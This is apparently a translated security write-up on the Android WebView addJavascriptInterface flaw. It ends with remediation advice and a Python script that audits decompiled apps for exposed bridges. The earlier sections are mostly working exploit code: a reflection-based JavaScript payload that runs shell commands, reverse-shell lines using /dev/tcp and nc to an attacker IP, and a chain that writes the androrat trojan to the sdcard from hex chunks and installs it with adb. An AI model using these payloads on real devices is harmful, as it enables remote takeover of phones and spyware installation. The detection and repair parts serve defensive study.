Android applications have a security vulnerability that is triggered simply by browsing a website and opening a link. A vulnerability submitted by a white hat shows that applications on the Android platform share a common security flaw: opening a link can lead to the remote installation of malicious applications and even complete control of the user's phone. At present WeChat, mobile QQ, QVOD and all the major mobile browsers have been affected.

0x00 background


The Android SDK wraps a WebView control, which is mainly used to open web pages for browsing. A program loads the WebView control and can set its properties (colour, font and so on), similar to directUI on PC. WebView has a very special interface function, addJavascriptInterface, which lets local Java and JS interact with each other. Through this interface function it is possible to break out of the webkit control and reach the Android device itself.

0x01 Detection and utilization


In general, when HTML is used to design an application page, addJavascriptInterface is almost unavoidable, including but not limited to Android browsers.

In Android code it is used like this:

// the WebSettings object comes from the WebView being configured
WebSettings settings = mWebView.getSettings();
settings.setJavaScriptEnabled(true);
settings.setJavaScriptCanOpenWindowsAutomatically(true);
mWebView.addJavascriptInterface(new JSInvokeClass(), "js2java");

You can find this code with the chain apk -> zip -> dex -> dex2jar -> jd-gui -> java, but decompiling to smali with apktool is recommended (after all, not every apk can be decompiled into Java code).

In smali the code looks like the following:

const-string v0, "js2java"
invoke-virtual {p1, v1, v0}, Lcom/tiantianmini/android/browser/module/ac;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

Once the code above is found, it can be verified further. In 2011 someone used addJavascriptInterface to read and write files and released a simple PoC; in 2012 a simple code-execution exp appeared, using reflection to call back into Java classes. The exploit code looks like the following:

<script>
function execute(cmdArgs)
{
    return js2java.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
</script>

It uses Java's exec to run Linux shell commands.

0x02 Remote access shell


To borrow a phrase from yuange: a PoC is worth far less than an exp.

Using addJavascriptInterface to get a shell.

The armlinux inside Android is not busybox, so some of the conventional reverse-shell methods are limited.

The Java reverse-shell method that was tried:

//execute(["/system/bin/sh","-c","exec 5<>/dev/tcp/192.168.1.9/8088;cat <&5 | while read line; do $line 2>&5 >&5; done"]);

On a Nexus One 4.3 Android virtual machine the shell did not come back.

Later it turned out that Android can execute the nc command (a stripped nc without -e).

So nc is used here to get the shell back another way.

Exp content:

<script>
function execute(cmdArgs)
{
return XXX.getClass().forName( "java.lang.Runtime" ).getMethod( "getRuntime" , null ).invoke( null , null ).exec(cmdArgs);
}
execute([ "/system/bin/sh" , "-c" , "nc 192.168.1.9 8088|/system/bin/sh|nc 192.168.1.9 9999" ]);
alert( "ok3" );
</script>

// Note: xxx stands in for the real interface name, which is redacted for privacy.

The effect is shown in the screenshot.

Of course a remote IP address can be used as well.

0x03 Remote mount


After all, in an Android environment a shell is not very convenient to use. Like xsser, I was not satisfied with that.

Taking it a step further: planting a trojan through the web page (挂马).

Android 4.1 added ASLR, so heap spraying is no longer effective, and UAF bugs target specific Android kernel versions. At present, exploiting the platform's own features is the reliable method.

Here the androrat remote-control trojan is used as the example.

Planting the trojan through the web page

Most browsers prompt before saving a downloaded file, so here andrat.apk has to be written out by the trojan page itself.

<script>
function execute(cmdArgs)
{
return xxx.getClass().forName( "java.lang.Runtime" ).getMethod( "getRuntime" , null ).invoke( null , null ).exec(cmdArgs);
}
 
var armBinary = "\x50\x4B\x03\x04\x14\x00\x08\x00\x08\x00\x51\x8F\xCA\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x04\x00\x72\x65\x73\x2F\x6C\x61\x79\x6F\x75\x74\x2F\x6D\x61\x69\x6E\x2E\x78\x6D\x6C\xFE\xCA\x00\x00\xAD\x52\x31\x6F\xD3\x40\x18\xFD\x2E\x76\xAE\x86\xC4\x69\x5A\x3A\x54\xA2\x12\xA9\xC4\x80\x22\x61\xE3\xAA\x42\x4D\xC7\x22\x86\x4A\x91\xA8\x14\xC4\x0A\x56\x7C\xC2\x27\x68\x1C\x39\x57\x0A\x53\x11\x3B\x63\x37\x06\xFE\x01\x33\x1B\x43\x17\x36\x56\xFE\x07\xAC\x6D\x9F\xCB\x1D\x3D\x
……
var patharm = " /data/app/Androrat.apk ";
var a=execute([" /system/bin/sh "," -c "," echo -n +armBinary+ > " + patharm]);
execute([" chmod "," 755 "," /data/app/Androrat.apk"]);

There are several problems:

The hex of andrat.apk is about 300k, and the browser or Java's exec may restrict the size of the parameters passed in (the tested browser was limited and could not execute it).

The /data/app/ directory has a permission problem: it needs root, and so does chmod.

Silent installation on Android needs either root or an install permission granted by the system signature, or making the package look like preinstalled software and rebooting. Or, around version 2.2, calling a hidden API to install.

After the subsequent fuzzing experiments, the trojan-planting function was completed:

<script>
function execute(cmdArgs)
{
return xxx.getClass().forName( "java.lang.Runtime" ).getMethod( "getRuntime" , null ).invoke( null , null ).exec(cmdArgs);
}
 
var armBinary1 = "\x50\x4B\x03\x04\x14\x00\x08\x00\x08\x00\x51\x8F\xCA\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x04\x00\x72\x65\x73\x2F\x6C\x61\x79\x6F\x75\x74\x2F\x6D\x61\x69\x6E\x2E\x78\x6D\x6C\xFE\xCA\x00\x00\xAD\x52\x31\x6F\xD3\x40\x18\xFD\x2E\x76\xAE\x86\xC4\x69\x5A\x3A\x54\xA2\x12\xA9\xC4
 
var armBinary2=" \x1B\xB0\x65\x0A\xAD\x23\xC2\x30\x64\xDF\xEE\xA1\x0D\xA4\xE8\x3F\x61\x80\xEE\xBC\xE1\xE7\x7B\x4A\x25\x6F\x8B\x36\x71\xC3\x80\x81\x58\xDB\xC9\x8F\x53\x9F\xEE\x8A\x45\xAF\x23\x54\x4A\xCF\x2B\x52\xF2\x33\x84\xBA\x82\x36\xC4\x0D\x08\xAF\xC2\x61\x8E\xD8\x7B\x0B\xFC\x88\x4A\x25\x24\x8C\x22\xFA\x76\x44\x78\x5E\x99\x62\x30\x44\x8D\xDB\x74\x94\
 
var armBinary3=…
var armBinary4=…
……
var patharm = "/mnt/sdcard/Androrat.apk" ;
var a=execute([ "/system/bin/sh" , "-c" , "echo -n +armBinary1+ > " + patharm]);
//alert(a);
execute([ "/system/bin/sh" , "-c" , "echo -n +armBinary2+ >> " + patharm]);
execute([ "/system/bin/sh" , "-c" , "echo  -n +armBinary3+ >> " + patharm]);
execute([ "/system/bin/sh" , "-c" , "echo -n +armBinary4+ >> " + patharm]);
execute([ "/system/bin/sh" , "-c" , "adb install /mnt/sdcard/Androrat.apk" ]);
alert( "over !!!" );
</script>

Split androrat.apk into pieces.

Use echo to write them to the sdcard (the directory is readable and writable but not executable).

Use the adb that comes with the device to install (this is how the various xx phone assistants install).

Androrat installs successfully; androrat's debug=true mode is used here.

It connects to the control side successfully.

0x04 Repair


1、Android 4.2 (API 17) introduced a new interface function [in Java it should be called a method :)], @JavascriptInterface, to replace addJavascriptInterface. Some Android 2.3 devices will never be upgraded, so browsers need to stay compatible with them.

2、When using the js2java bridge, every parameter passed in needs to be validated to block attack code.

3、Control the relevant permissions, or use the js2java bridge as little as possible.
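As an added example (not part of the original post, and not the code of androrat or of any app mentioned above), the following Python script automates the detection described in 0x01 and checks the remediation from 0x04 against apktool output. It scans smali for addJavascriptInterface calls, recovers the JS-side name and the exposed class by walking back to the const-string and new-instance that fill the argument registers (a heuristic that assumes the straight-line register usage shown above), then lists which public methods of the exposed class carry the runtime @JavascriptInterface annotation and rates the bridge against the app's minSdkVersion and targetSdkVersion. The smali sample, the class and method names and the SDK values are all constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample smali (not from any real app): an activity that registers a bridge
# object under the name "js2java", and the bridge class it exposes. Names are made up.
SAMPLE_SMALI = {
    "com/example/browser/MainActivity.smali": """\
.class public Lcom/example/browser/MainActivity;
.super Landroid/app/Activity;

.method private setupWebView(Landroid/webkit/WebView;)V
    .locals 2
    new-instance v1, Lcom/example/browser/JSInvokeClass;
    invoke-direct {v1}, Lcom/example/browser/JSInvokeClass;-><init>()V
    const-string v0, "js2java"
    invoke-virtual {p1, v1, v0}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    return-void
.end method
""",
    "com/example/browser/JSInvokeClass.smali": """\
.class public Lcom/example/browser/JSInvokeClass;
.super Ljava/lang/Object;

.method public constructor <init>()V
    .locals 0
    invoke-direct {p0}, Ljava/lang/Object;-><init>()V
    return-void
.end method

.method public showToast(Ljava/lang/String;)V
    .locals 0
    .annotation runtime Landroid/webkit/JavascriptInterface;
    .end annotation
    return-void
.end method

.method public openFile(Ljava/lang/String;)V
    .locals 0
    return-void
.end method
""",
}

INVOKE_RE = re.compile(r"invoke-virtual\s+\{(?P<regs>[^}]*)\},\s*L[^;]+;->addJavascriptInterface\(")
CONST_STRING_RE = re.compile(r'const-string(?:/jumbo)?\s+(?P<reg>[pv]\d+),\s*"(?P<val>[^"]*)"')
NEW_INSTANCE_RE = re.compile(r"new-instance\s+(?P<reg>[pv]\d+),\s*(?P<cls>L[^;]+;)")
METHOD_RE = re.compile(r"^\.method\s+(?P<flags>(?:[a-z-]+\s+)*)(?P<name>[^\s(]+)\(")
JSI_ANNOTATION = ".annotation runtime Landroid/webkit/JavascriptInterface;"


def _last_write(pattern, lines, idx, reg):
    """Walk backwards from line idx to the most recent instruction that writes register reg."""
    for line in reversed(lines[:idx]):
        m = pattern.search(line)
        if m and m.group("reg") == reg:
            return m
    return None


def find_bridges(smali: str) -> List[dict]:
    """Return every addJavascriptInterface call with the JS name and exposed class resolved."""
    lines, found = smali.splitlines(), []
    for idx, line in enumerate(lines):
        m = INVOKE_RE.search(line)
        if not m:
            continue
        regs = [r.strip() for r in m.group("regs").split(",")]
        obj_reg, name_reg = regs[1], regs[2]  # arguments are (this, Object obj, String name)
        name_m = _last_write(CONST_STRING_RE, lines, idx, name_reg)
        obj_m = _last_write(NEW_INSTANCE_RE, lines, idx, obj_reg)
        found.append({"line": idx + 1,
                      "js_name": name_m.group("val") if name_m else "<unresolved>",
                      "exposed_class": obj_m.group("cls") if obj_m else "<unresolved>"})
    return found


def public_methods(smali: str) -> Dict[str, bool]:
    """Map each public method (constructors excluded) to whether it carries @JavascriptInterface."""
    result, current = {}, None
    for raw in smali.splitlines():
        line = raw.strip()
        m = METHOD_RE.match(line)
        if m:
            public = "public" in m.group("flags").split() and not m.group("name").startswith("<")
            current = m.group("name") if public else None
            if current is not None:
                result[current] = False
        elif line == ".end method":
            current = None
        elif current is not None and line == JSI_ANNOTATION:
            result[current] = True
    return result


def audit(files: Dict[str, str], min_sdk: int, target_sdk: int) -> List[dict]:
    """Rate every bridge in a decompiled app: exposed methods plus the SDK-level risk."""
    findings = []
    for path, smali in files.items():
        for bridge in find_bridges(smali):
            cls_file = bridge["exposed_class"][1:-1] + ".smali"  # Lcom/a/B; lives in com/a/B.smali
            methods = public_methods(files.get(cls_file, ""))
            annotated = sorted(n for n, ok in methods.items() if ok)
            unannotated = sorted(n for n, ok in methods.items() if not ok)
            if target_sdk < 17:
                severity, note = "HIGH", "targetSdkVersion < 17: annotation ignored everywhere, all public methods (getClass() included) reachable from page script"
            elif min_sdk < 17:
                severity, note = "HIGH", "minSdkVersion < 17: below Android 4.2 the annotation is ignored and all public methods are reachable"
            else:
                severity, note = ("MEDIUM" if annotated else "LOW"), "only @JavascriptInterface methods are callable; validate every argument they accept"
            findings.append({"file": path, **bridge, "annotated": annotated, "unannotated": unannotated,
                             "severity": severity, "note": note})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SMALI, min_sdk=9, target_sdk=19):
        print(f"[{f['severity']}] {f['file']}:{f['line']} name={f['js_name']} class={f['exposed_class']}")
        print(f"    annotated={f['annotated']} unannotated={f['unannotated']}\n    {f['note']}")
```

To run it against a real app, replace SAMPLE_SMALI with a dict built by reading every .smali file under apktool's smali/ directory (keyed by the path relative to that directory) and take minSdkVersion/targetSdkVersion from the decoded AndroidManifest.xml. The register walk-back is deliberately simple; a call whose object or name is passed in from another method is reported as <unresolved> rather than guessed.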

Link:
http://developer.android.com/reference/android/webkit/WebView.html
http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf
http://50.56.33.56/blog/?p=314
